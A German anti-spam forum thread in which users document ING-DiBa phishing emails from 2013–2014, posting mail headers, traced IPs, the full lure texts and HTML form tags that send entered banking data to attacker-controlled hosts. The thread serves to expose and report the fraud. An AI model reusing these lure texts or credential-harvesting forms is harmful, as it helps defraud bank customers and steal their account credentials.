ING-DiBa Phishing

[kjz1]

Jetzt ist auch die ING-DiBa dran. Aber die Handschrift von Phiski ist unverkennbar: Phishing mittles HTML-Anhang, in dem sich ein Form-PHP-Skript auf gecracktem Server verbirgt:

header:

01: Received: from mail.envios-email.es ([81.33.30.173]) by mx-ha.gmx.net
02:  (mxgmx009) with ESMTP (Nemesis) ID: [ID filtered]
03: Received: from User ([61.33.227.81]) by envios-email.es with MailEnable
04: ESMTP; Tue, 12 Mar 2013 xx:xx:xx +0100

header:

01: Received: from mail.envios-email.es ([81.33.30.173]) by mx-ha.gmx.net
02:  (mxgmx012) with ESMTP (Nemesis) ID: [ID filtered]
03:  Tue, 12 Mar 2013 xx:xx:xx +0100
04: Received: from User ([61.33.227.81]) by envios-email.es with MailEnable
05: ESMTP; Tue, 12 Mar 2013 xx:xx:xx +0100

IP: 61.33.227.81 ---> BORANET, KR

*Sehr geehrter Kunde*

Wir haben vor kurzem erkannt das bei ihrem ING-DiBa Konto ein Problem
aufgetreten ist.

Da bei ING-DiBa Sicherheit gro©¬geschrieben wird und wir ihr Konto vor
unbefugter
Nutzung schutzen

wollen haben wir ihnen eine E ?Mail geschickt bitte laden sie das darin
enthaltende
Formular und melden sie sich erneut an um
fortfahren zu konnen.

Mit freundlichen Gru©¬en
*ING-DiBa Kundenbetreuung*
--------------------------------------------------------------------------------

Copyright 2013 ING-DiBa. Alle Rechte sind vorbehalten.


Das Dokument im Anhang zu dieser E-Mail wird am besten auf Firefox und
Google Chrome Browser angezeigt.

Im HTML-Anhang (Form.Update.html) dann eine gecrackte Wordpress-Installation:

[html]<form name="pinLoginForm" method="post" action="http://flystudio.my/wp-content/gallery/works/,.,/login.php" class="form">[/html]
IP: 202.75.39.216 ---> TM VADS DC Hosting, Malaysia

von dort geht es dann weiter auf einen weiteren gecrackten Server:

^whois: [Link nur für registrierte Mitglieder sichtbar. ]

IP: 69.194.199.138 ---> Solar VPS

[kjz1]

Mein altbekannter Phiski von der Russenmafia, unverkennbar an den Phishing Mails mit HTML-Anhang inklusive <form> Skript:

header:

01: Received:  from server4.starthosting.nl ([93.94.226.59]) by mx-ha.gmx.net
02:  (mxgmx011) with ESMTPS (Nemesis) ID: [ID filtered]
03: Received: from [149.210.140.153] (149-210-140-153.colo.transip.net
04: [149.210.140.153] (may be forged))
05: 	(authenticated bits=0)
06: 	by server4.starthosting.nl (8.14.3/8.14.3/Debian-9.1ubuntu1) with ESMTP
07: ID: [ID filtered]

Unser System hat festgestellt, dass Ihr Telefon-Banking PIN aus
Sicherheitsgr&uuml;nden ge&auml;ndert werden muss. Bitte benutzen Sie
dieses Formular um die &Auml;nderung Ihres Telefon-Banking PIN
kostenfrei zu &auml;ndern.

Andernfalls m&uuml;ssen wir Ihr Konto mit 14,99&euro; belasten und die
&Auml;nderung schriftlich &uuml;ber den Postweg bei Ihnen einfordern.

Ihren Telefon-Banking PIN k&ouml;nnen Sie hier oder wie folgt
&auml;ndern:

1. &Ouml;ffnen Sie die Datei in Ihrem Emailanhang und w&auml;hlen Sie
"&ouml;ffnen mit" aus! 2. F&uuml;llen Sie alle Daten aus und klicken
Sie dann auf "Daten absenden"! 3. Ihr Telefon-Banking PIN aktiviert
sich nach 5-7Werktagen!

F&uuml;r weitere Fragen steht unser Online Support unter
[Link nur für registrierte Mitglieder sichtbar. ] 24Std. f&uuml;r Sie zur Verf&uuml;gung.

Mit freundlichen Gr&uuml;&szlig;en

ING-DiBa AG

Im HTML-Anhang dann:

[HTML]<form class="form wizard" id="id1df" method="post" action="http://v2.ingdiibad.biz/app/login/ing.php" novalidate="novalidate">[/HTML]

IP: 193.107.19.161 ---> Ideal Solution Ltd., Russia

[kjz1]

Und wieder mal der Blöd-Phishki mit HTML-Anhang:

header:

01: Received:  from 01.cstore.pl ([5.9.151.14]) by mx-ha.gmx.net (mxgmx005) with
02: 	ESMTPS (Nemesis) ID: [ID filtered]
03: Received: from [187.115.202.109] (helo=User) by 01.cstore.pl with esmtpa (Exim
04: 	4.73) (envelope-from <info [at] ing-diba.de>) ID: [ID filtered]

IP: 5.9.151.14 ---> Hetzner... iiiih, wieviele verranzte Kisten gammeln bei denen denn noch so rum?

IP: 187.115.202.109 ---> 187.115.202.109.static.gvt.net.br

Sehr geehrter Kunde,

--------------------------------------------------

Wir haben unregelmäßige Aktivität Ihrer Konto erkannt.
Zu Ihrem Schutz, beschränken wir es, bis Sie Ihre Angaben Bestätigung.

Bitte laden Sie das angehängte Dokument und überprüfen Sie Ihre Daten.
Wenn Sie diese E-Mail ignorieren Ihre Konto wird gesperrt.

--------------------------------------------------

Bitte verwenden Sie die Website auf dem Laufenden bleiben.
Nutzen Sie diese Gelegenheit, um unser Unternehmen und unsere Reserven
einzuführen.

Vielen Dank,
Kundendienst.

Urheberrecht ING DIBA. Alle Rechte vorbehalten.

[HTML]<form class="form wizard" id="id15" method="post"
action="http://visiontime.in/o/ [Link nur für registrierte Mitglieder sichtbar. ]" novalidate="novalidate">[/HTML]

IP: 66.7.209.169 ---> root.fastcpanel.com/Dimenoc

Die Kiste schwächelt schon...

[kjz1]

Blöd-Phishki macht weiter:

header:

01: Received:  from kr3467.vps.e-hosting.lu ([5.9.215.182]) by mx-ha.gmx.net
02: 	(mxgmx103) with ESMTPS (Nemesis) ID: [ID filtered]
03: Received: from User (213.177.225.235.adsl.griffin.net.uk [213.177.225.235]) by
04: 	kr3467.vps.e-hosting.lu (Postfix) with ESMTPA ID: [ID filtered]

Sehr geehrter Kunde,

--------------------------------------------------

Wir haben unregelmäßige Aktivität Ihrer Konto erkannt.
Zu Ihrem Schutz, beschränken wir es, bis Sie Ihre Angaben Bestätigung.

Bitte laden Sie das angehängte Dokument und überprüfen Sie Ihre Daten.
Wenn Sie diese E-Mail ignorieren Ihre Konto wird gesperrt.

--------------------------------------------------

Bitte verwenden Sie die Website auf dem Laufenden bleiben.
Nutzen Sie diese Gelegenheit, um unser Unternehmen und unsere Reserven
einzuführen.

Vielen Dank,
Kundendienst.

Urheberrecht ING DIBA. Alle Rechte vorbehalten.

[HTML]<form class="form wizard" id="id15" method="post" action="http://visiontime.in/o/ [Link nur für registrierte Mitglieder sichtbar. ]">[/HTML]

IP: 66.7.209.169 ---> root.fastcpanel.com, Dimenoc

[DJANGO]

Ganz aktuell - Phishing-Versuch bei diversen Ing-Diba-Kunden:

Betreff: ING-DiBa Telefon-PIN aktualisierung
Datum: Sun, 25 May 2014 12:40:43 +0200
Von: Ing-DiBa < [Link nur für registrierte Mitglieder sichtbar. ]>

Telefon-Pin
aktualisierung
Unser Tipp: Jetzt Online ausfüllen und Gebühren sparen!
Mit freundlichen Grüßen
ING-DiBa

Sehr geehrte/r Kunde,


Unser System hat festgestellt, dass Ihr Telefon-Banking PIN aus Sicherheitsgründen
geändert werden muss. Bitte benutzen Sie dieses Formular
um die Änderung Ihres Telefon-Banking PIN kostenfrei zu ändern.

Andernfalls müssen wir Ihr Konto mit 14,99€ belasten
und die Änderung schriftlich über den Postweg bei Ihnen einfordern.

Ihren Telefon-Banking PIN können Sie hier oder wie folgt ändern:

1. Öffnen Sie die Datei in Ihrem Emailanhang und wählen Sie "öffnen mit" aus!
2. Füllen Sie alle Daten aus und klicken Sie dann auf "Daten absenden"!
3. Ihr Telefon-Banking PIN aktiviert sich nach 5-7Werktagen!

Für weitere Fragen steht unser Online Support unter [Link nur für registrierte Mitglieder sichtbar. ] 24Std. für Sie zur Verfügung.

[Arthur]

Andere Variante: [Link nur für registrierte Mitglieder sichtbar. ]

Ferner vom Phishing betroffen sind Kunden der ING-DiBa. Hier erreichten uns Mails mit der Betreffzeile "Lieber ING-DiBa Kunde, Ihre Mithilfe ist gefragt!": Das System der ING-DiBa habe festgestellt, dass der Telefon-PIN des Empfängers aus Sicherheitsgründen geändert werden müsse. Um die Änderung durchführen zu können, soll das angehängte Formular heruntergeladen und genutzt werden. Sollte dies nicht geschehen, müsse das Konto des Empfängers mit 18€ belastet und die Änderung auf dem Postweg eingefordert werden.

Hinweise von ING.DiBa: [Link nur für registrierte Mitglieder sichtbar. ]

Bitte beachten Sie folgende Hinweise:
Melden Sie sich nur über die Ihnen bekannte Homepage der ING-DiBa an. Verwenden Sie keine Links aus E-Mails zur Anmeldung zum Internetbanking und Brokerage.
Verwenden Sie nur Links auf https://www.ing-diba.de/

[Mittwoch]

Angehängtes Formular? Das klingt eher nicht nach Phishing, sondern nach dem hier, gerade in Verbindung mit den angedrohten Gebühren.

Schönen Gruß
Mittwoch

[cano89]

header:

01: Return-Path:	<direkt [at] ing-diba.de>
02: Received:	from mailin51.aul.t-online.de ([172.20.27.0]) by
03: 	ehead604.aul.t-online.de (Dovecot) with LMTP ID: [ID filtered]
04: Received:	from maildrop3.i-pas.nl ([85.17.181.99]) by mailin51.aul.t-online.de
05: 	with (TLSv1:DHE-RSA-AES256-SHA encrypted) esmtp ID: [ID filtered]
06: Received:	from maildrop3.i-pas.nl (localhost [127.0.0.1]) by maildrop3.i-pas.nl
07: 	(Postfix) with ESMTP ID: [ID filtered]
08: Received:	by maildrop3.i-pas.nl (Postfix, from userID: [ID filtered]
09: Received:	from [85.214.130.209] (h1944860.stratoserver.net
10: 	[85.214.130.209]) by maildrop3.i-pas.nl (Postfix) with ESMTPA ID: [ID filtered]
11: X-SPAM-SCORE:	0.2
12: X-SPAM-CHECKER-VERSION:	SpamAssassin 3.2.4 (2008-01-01) on maildrop3.i-pas.nl
13: X-SPAM-LEVEL:	
14: X-SPAM-STATUS:	No, score=0.2 required=2.5 tests=ALL_TRUSTED,BAYES_00,
15: 	HTML_EXTRA_CLOSE,HTML_IMAGE_ONLY_08,HTML_MESSAGE,HTML_SHORT_LINK_IMG_1 autolearn=no
16: 	version=3.2.4
17: Message-Id:	<uv5LgwIohaYG1smwaLbpjllWLPpMWsmDg0Lg3xE6CD5F [at] ing-diba.de>
18: Mime-Version:	1.0
19: X-BOUNCE-TRACKING-INFO:	<bWljaGFlbC5iYXVlcjg5CQkJbWljaGFlbC5iYXVlcjg5QHQtb25saW5lLmRl
20: 	UlORyBEaUJhIC0gVGVsZWJhbmtpbmcgUElOIEFrdHVhbGlzaWVydW5nCTYJCTIwNTgJYm91bmNlCW5vCW5v>
21: Content-Type:	multipart/alternative;
22: 	Boundary="--=BOUNDARY_1121710_SRHC_ACFH_VMHT_FNUU"
23: X-VIRUS-SCANNED:	ClamAV using ClamSMTP
24: X-TOI-SPAM:	u;0;2014-11-02Txx:xx:xxZ
25: X-TOI-VIRUSSCAN:	clean
26: X-TOI-EXPURGATEID:	149288::1414944616-000014B7-6780DAD7/0-0/0-0
27: X-TOI-MSGID:	680393ba-e957-4101-a431-c183f18a6656
28: X-SEEN:	false
29: X-ENVELOPE-TO:	

Die Mail wird komplett als Bild dargestellt

[Link nur für registrierte Mitglieder sichtbar. ]
[Link nur für registrierte Mitglieder sichtbar. ]

Der Rotz kommt von hier ^whois: [Link nur für registrierte Mitglieder sichtbar. ]

[cmds]

header:

01: Received: from smtp.emaxxtelecom.com (mail.emaxxtelecom.com [103.246.144.145])
02: 	by mail-in9-pp.ewetel.de (8.12.1/8.12.9) with ESMTP ID: [ID filtered]
03: 	for <me>; Sun, 16 Nov 2014 xx:xx:xx +0100
04: X-Envelope-To: <me>
05: Received: from localhost (localhost.localdomain [127.0.0.1])
06: 	by smtp.emaxxtelecom.com (Postfix) with ESMTP ID: [ID filtered]
07: 	for <me>; Sun, 16 Nov 2014 xx:xx:xx +0700 (ICT)
08: X-Virus-Scanned: amavisd-new at smtp.emaxxtelecom.com
09: Received: from smtp.emaxxtelecom.com ([127.0.0.1])
10: 	by localhost (smtp.emaxxtelecom.com [127.0.0.1]) (amavisd-new, port 10024)
11: 	with ESMTP ID: [ID filtered]
12: 	Sun, 16 Nov 2014 xx:xx:xx +0700 (ICT)
13: Received: from [62.68.96.177] (unknown [62.68.96.177])
14: 	by smtp.emaxxtelecom.com (Postfix) with ESMTPA ID: [ID filtered]
15: 	for <me>; Sun, 16 Nov 2014 xx:xx:xx +0700 (ICT)

Sehr geehrte/r Kunde,
--------------------------------------------------------------------------------

Unser System hat festgestellt, dass Ihr Telefon-Banking PIN aus Sicherheitsgründen
geändert werden muss.


Andernfalls müssen wir *Ihr Konto mit 14,99€ belasten*
und die Änderungen schriftlich über den Postweg bei Ihnen einfordern

Ihren Telefon-Banking PIN können Sie hier <^whois: [Link nur für registrierte Mitglieder sichtbar. ]> ändern.

Für weitere Fragen steht unser Online Support unter [Link nur für registrierte Mitglieder sichtbar. ]
<mailto: [Link nur für registrierte Mitglieder sichtbar. ]> 24Std. für Sie zur
Verfügung.

Mit freundlichen Grüßen

ING-DiBa AG

gekürzte (getarnte) URL leitet um nach: ^whois: [Link nur für registrierte Mitglieder sichtbar. ]

natürlich sofort an alle massgeblichen Stellen verpetzt

[madman70]

Hmmm - komplett leere Mail ohne Text, nur ein angehängtes HTML-Formular, mit dem die Ing Diba meine Daten wohl im fernen Kalifornien checken lassen will.

Das Formular soll die Daten nach ^whois: [Link nur für registrierte Mitglieder sichtbar. ] schicken...

Hier noch ein Header der Mail - ist ganz schön rumgekommen, das gute Stück:

header:

01: Return-Path: info [at] dkd.de
02: Received: from mail.babolat.com.py ([190.128.232.178]) by mx-ha.web.de
03:  (mxweb006) with ESMTP (Nemesis) ID: [ID filtered]
04:  <xxxxx [at] web.de>; Thu, 18 Dec 2014 xx:xx:xx +0100
05: Received: from localhost (localhost.localdomain [127.0.0.1])
06: 	by mail.babolat.com.py (Postfix) with ESMTP ID: [ID filtered]
07: 	for <poor [at] spamvictim.tld>; Thu, 18 Dec 2014 xx:xx:xx -0300 (PYST)
08: X-Virus-Scanned: amavisd-new at babolat.com.py
09: Received: from mail.babolat.com.py ([127.0.0.1])
10: 	by localhost (mail.babolat.com.py [127.0.0.1]) (amavisd-new, port 10024)
11: 	with ESMTP ID: [ID filtered]
12: 	Thu, 18 Dec 2014 xx:xx:xx -0300 (PYST)
13: Received: from dkd.de (stats.enterx.arvixevps.com [192.169.55.49])
14: 	by mail.babolat.com.py (Postfix) with ESMTPA ID: [ID filtered]
15: 	for <poor [at] spamvictim.tld>; Thu, 18 Dec 2014 xx:xx:xx -0300 (PYST)
16: From: "ING Diba"<info [at] dkd.de>